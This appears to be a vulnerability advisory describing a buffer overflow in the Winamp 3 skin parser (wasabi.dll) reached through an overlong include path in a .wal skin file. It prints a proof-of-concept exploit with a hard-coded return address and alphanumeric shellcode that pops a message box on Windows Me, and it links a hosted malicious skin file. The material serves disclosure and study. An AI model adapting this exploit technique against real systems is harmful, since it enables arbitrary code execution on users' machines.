COMMAND

	Winamp 3 XML parser buffer overflow vulnerability

SYSTEMS AFFECTED

	Winamp 3 1.0.0.488

PROBLEM

	Sunnis [annihilator@inet.hr] [http://www.ii-labs.tk] found :
	

	Winamp 3 skin files are *.WAL and  are  automatically  opened  by  MSIE.
	They are  actually  ZIP  files  with  altered  extension.  They  contain
	pictures  and  configuration  files  used  by  wsabi  (Winamp   skinning
	system).
	

	Wsabi engine  is  implemented  inside  wasabi.dll  and  is  designed  to
	provide very configurable, OS-independant system for building  skinnable
	applications, quickly and easily (that's the  reason  why  wsabi.dll  is
	800K big).
	

	A  buffer  overflow  inside   wsabi.dll   may   occur   if   <include
	file="PATH"/> tag is altered with extremely huge  value  for  file  PATH
	(btw, MAX_PATH on win32 is defined to be only 512B). This can allow  the
	execution of arbitrary code inside the address space  of  Winamp.  Wsabi
	filters most non- printable characters but specially designed  shellcode
	will still pass through.
	

	======[ Exploit
	

	By writing an extremely  long  string  of  'A'  chars  and  setting  the
	kerenl- mode debugger to capture page faults, one can see  that  at  the
	point  of  execution,   both   EAX   and   EBX   contain   pointers   to
	[OverwrittenEIP-4]. ESP is unusable since  it  points  to  some  strange
	value.
	

	Winamp3 exe (studio.exe)  loads  many  system  DLLs  wich  contain  some
	usable instructions:
	

	        jmp eax

	        jmp ebx

	        call eax

	        call ebx

	

	On Windows Me there is such on 0x736D2120 (we  can't  use  some  of  the
	Winamp's modules since  their  ASCII  imagebase  representation  is  NOT
	considered to be valid  (between  0x20  and  0x7F)  by  Wsabi  and  will
	trigger an error message).
	

	Stack would look like this:
	

	['AAAAAAAAAAAA'... XXXX[OverwrittenEIP][shellcode]

	                   ^^^^-address contained inside EAX and EBX

	

	Sample proof of concept shellcode would look like this:
	

	                                  ; ASCII opcode representation:

	        jmp __skip                ; ë+

	        db 0, 0

	        dd 736D2120h              <- call eax

	        

	        db 25h dup ('A')          ; needed because of JMP

	        

	__skip: mov eax, 39406567h        ; ¸ge@

	        sub eax, 794c2421h        ; -!$Ly

	        push eax                  ; P

		pop ecx                   ; Y

		; eax = bff44146 = USER32!MessageBoxA on winMe

	

	        push 'aaaa'               ; haaaa

	        pop eax                   ; X

	        xor eax, 'aaaa'           ; 5aaa

	        ; eax = 0

	

	        push eax                  ; P = NULL-terminator

	        push "tiol"               ; hloit

		push "pxe "               ; h exp

	        push "tpec"               ; hcept

	        push "noc-"               ; h-con

	        push "fo-f"               ; hf-of

	        push "oorp"               ; hproo

	        push " 3pm"               ; hmp3 

	        push "aniW"               ; hWina

	        push esp                  ; T

	        pop edx                   ; Z

	        ; edx = ptr to string

	

	        push eax                  ; P

	        push eax                  ; P

	        push edx                  ; R

	        push eax                  ; P

			

	        push ebx                  ; S = return address

			

	        push eax                  ; Q = user32!MessageBoxA (v. 4.90.3000)

	        retn                      ; &#258;

	

	Filtering  chars  doesn't  provide  any  protection  at   all.   Writing
	alphanumeric shellcode using specialized kits such as irx's ASC is  even
	easier.
	

	You can try this one here:
	

	 kamikaza.ffk.hr/advisory/default.wal

	

	It works on WinMe  (4.90)  only,  but  adaptation  on  other  win32s  is
	trivial.

SOLUTION

	?